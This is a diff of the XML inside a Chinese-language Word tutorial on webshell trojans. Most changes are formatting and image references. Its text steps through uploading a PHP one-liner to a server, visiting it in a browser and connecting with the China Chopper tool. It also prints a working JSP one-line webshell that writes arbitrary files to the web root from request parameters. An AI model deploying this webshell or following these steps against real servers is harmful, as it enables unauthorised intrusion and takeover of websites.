--- a/web/trojan/webshell木马.docx
+++ b/web/trojan/webshell木马.docx
@@ -1,6 +1,6 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:body>
     <w:p>
       <w:pPr>
@@ -266,129 +266,10 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72B77BEF" wp14:editId="67098154">
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4162425" cy="1019175"/>
             <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
             <wp:docPr id="10" name="图片 10"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId4"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="4162425" cy="1019175"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="156" w:after="156"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>使用浏览器访问服务器上传的文件</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="156" w:after="156"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="667EB025" wp14:editId="00F8111F">
-            <wp:extent cx="3829050" cy="1638300"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="11" name="图片 11"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId5"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="3829050" cy="1638300"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="156" w:after="156"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>然后使用菜刀连接</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>，不填写参数也能进去</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="156" w:after="156"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08CFEB41" wp14:editId="4B83AFB8">
-            <wp:extent cx="4362450" cy="2009775"/>
-            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
-            <wp:docPr id="12" name="图片 12"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -408,6 +289,125 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
+                      <a:ext cx="4162425" cy="1019175"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>使用浏览器访问服务器上传的文件</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="3829050" cy="1638300"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="11" name="图片 11"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3829050" cy="1638300"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>然后使用菜刀连接</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，不填写参数也能进去</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="4362450" cy="2009775"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="12" name="图片 12"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
                       <a:ext cx="4362450" cy="2009775"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
@@ -430,7 +430,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04F69E93" wp14:editId="3E6C6DB6">
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5133975" cy="1933575"/>
             <wp:effectExtent l="19050" t="19050" r="28575" b="28575"/>
             <wp:docPr id="13" name="图片 13"/>
@@ -445,7 +445,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill rotWithShape="1">
-                    <a:blip r:embed="rId7"/>
+                    <a:blip r:embed="rId9"/>
                     <a:srcRect b="7306"/>
                     <a:stretch/>
                   </pic:blipFill>
@@ -468,7 +468,7 @@
                     </a:ln>
                     <a:extLst>
                       <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
-                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns=""/>
                       </a:ext>
                     </a:extLst>
                   </pic:spPr>
@@ -482,9 +482,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="3"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -513,25 +510,13 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>ph</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>p</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>一</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>句话上传到服务器当中</w:t>
+        <w:t>php</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>一句话上传到服务器当中</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -562,9 +547,8 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E9A9801" wp14:editId="50097B83">
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5274310" cy="704850"/>
             <wp:effectExtent l="0" t="0" r="2540" b="0"/>
             <wp:docPr id="14" name="图片 14"/>
@@ -579,7 +563,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill rotWithShape="1">
-                    <a:blip r:embed="rId8"/>
+                    <a:blip r:embed="rId10"/>
                     <a:srcRect b="13281"/>
                     <a:stretch/>
                   </pic:blipFill>
@@ -596,7 +580,7 @@
                     </a:ln>
                     <a:extLst>
                       <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
-                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns=""/>
                       </a:ext>
                     </a:extLst>
                   </pic:spPr>
@@ -627,7 +611,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71453BBA" wp14:editId="555D022C">
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4010025" cy="1114425"/>
             <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
             <wp:docPr id="15" name="图片 15"/>
@@ -642,7 +626,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill rotWithShape="1">
-                    <a:blip r:embed="rId9"/>
+                    <a:blip r:embed="rId11"/>
                     <a:srcRect b="16429"/>
                     <a:stretch/>
                   </pic:blipFill>
@@ -659,7 +643,7 @@
                     </a:ln>
                     <a:extLst>
                       <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
-                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns=""/>
                       </a:ext>
                     </a:extLst>
                   </pic:spPr>
@@ -689,8 +673,9 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B591973" wp14:editId="12838F56">
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4343400" cy="1819275"/>
             <wp:effectExtent l="0" t="0" r="0" b="9525"/>
             <wp:docPr id="16" name="图片 16"/>
@@ -705,7 +690,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill rotWithShape="1">
-                    <a:blip r:embed="rId10"/>
+                    <a:blip r:embed="rId12"/>
                     <a:srcRect t="6047" b="5116"/>
                     <a:stretch/>
                   </pic:blipFill>
@@ -722,7 +707,7 @@
                     </a:ln>
                     <a:extLst>
                       <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
-                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns=""/>
                       </a:ext>
                     </a:extLst>
                   </pic:spPr>
@@ -736,9 +721,6 @@
     <w:p>
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -756,7 +738,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FA70E47" wp14:editId="4082021C">
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="3752850" cy="1581150"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="17" name="图片 17"/>
@@ -771,7 +753,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
+                    <a:blip r:embed="rId13"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -811,9 +793,8 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2248C53C" wp14:editId="5002AA29">
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4333875" cy="1952625"/>
             <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
             <wp:docPr id="18" name="图片 18"/>
@@ -828,7 +809,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12"/>
+                    <a:blip r:embed="rId14"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -863,16 +844,13 @@
     <w:p>
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C1290A8" wp14:editId="30C34348">
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4695825" cy="1914525"/>
             <wp:effectExtent l="19050" t="19050" r="28575" b="28575"/>
             <wp:docPr id="19" name="图片 19"/>
@@ -887,7 +865,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13"/>
+                    <a:blip r:embed="rId15"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -918,6 +896,7 @@
         <w:pStyle w:val="3"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>J</w:t>
       </w:r>
       <w:r>
@@ -959,9 +938,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>&lt;%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%&gt;</w:t>
@@ -976,7 +952,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79F90A23" wp14:editId="5EEFE654">
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5274310" cy="883920"/>
             <wp:effectExtent l="0" t="0" r="2540" b="0"/>
             <wp:docPr id="1" name="图片 1"/>
@@ -991,7 +967,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14"/>
+                    <a:blip r:embed="rId16"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1031,9 +1007,8 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="252F57AD" wp14:editId="46891FCF">
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4648200" cy="1543050"/>
             <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
             <wp:docPr id="2" name="图片 2"/>
@@ -1048,7 +1023,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15"/>
+                    <a:blip r:embed="rId17"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1094,7 +1069,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63F9E262" wp14:editId="6DB09C96">
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5274310" cy="577215"/>
             <wp:effectExtent l="19050" t="19050" r="21590" b="13335"/>
             <wp:docPr id="3" name="图片 3"/>
@@ -1109,7 +1084,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16"/>
+                    <a:blip r:embed="rId18"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1138,9 +1113,6 @@
     <w:p>
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1170,9 +1142,9 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66E6FD58" wp14:editId="7F6C7826">
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5274310" cy="1735455"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:effectExtent l="19050" t="19050" r="21590" b="17145"/>
             <wp:docPr id="4" name="图片 4"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -1185,7 +1157,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
+                    <a:blip r:embed="rId19"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1198,6 +1170,13 @@
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
+                    <a:ln>
+                      <a:solidFill>
+                        <a:schemeClr val="bg2">
+                          <a:lumMod val="75000"/>
+                        </a:schemeClr>
+                      </a:solidFill>
+                    </a:ln>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -1264,8 +1243,9 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74DD3A0B" wp14:editId="460F3701">
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5274310" cy="1076960"/>
             <wp:effectExtent l="19050" t="19050" r="21590" b="27940"/>
             <wp:docPr id="5" name="图片 5"/>
@@ -1280,7 +1260,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18"/>
+                    <a:blip r:embed="rId20"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1337,9 +1317,8 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78C8157A" wp14:editId="270DE9DC">
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4686300" cy="1114425"/>
             <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
             <wp:docPr id="6" name="图片 6"/>
@@ -1354,7 +1333,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19"/>
+                    <a:blip r:embed="rId21"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1400,16 +1379,13 @@
     <w:p>
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C3B95B8" wp14:editId="1F0C319E">
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4876800" cy="1866900"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="7" name="图片 7"/>
@@ -1424,7 +1400,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill rotWithShape="1">
-                    <a:blip r:embed="rId20"/>
+                    <a:blip r:embed="rId22"/>
                     <a:srcRect b="16596"/>
                     <a:stretch/>
                   </pic:blipFill>
@@ -1441,7 +1417,7 @@
                     </a:ln>
                     <a:extLst>
                       <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
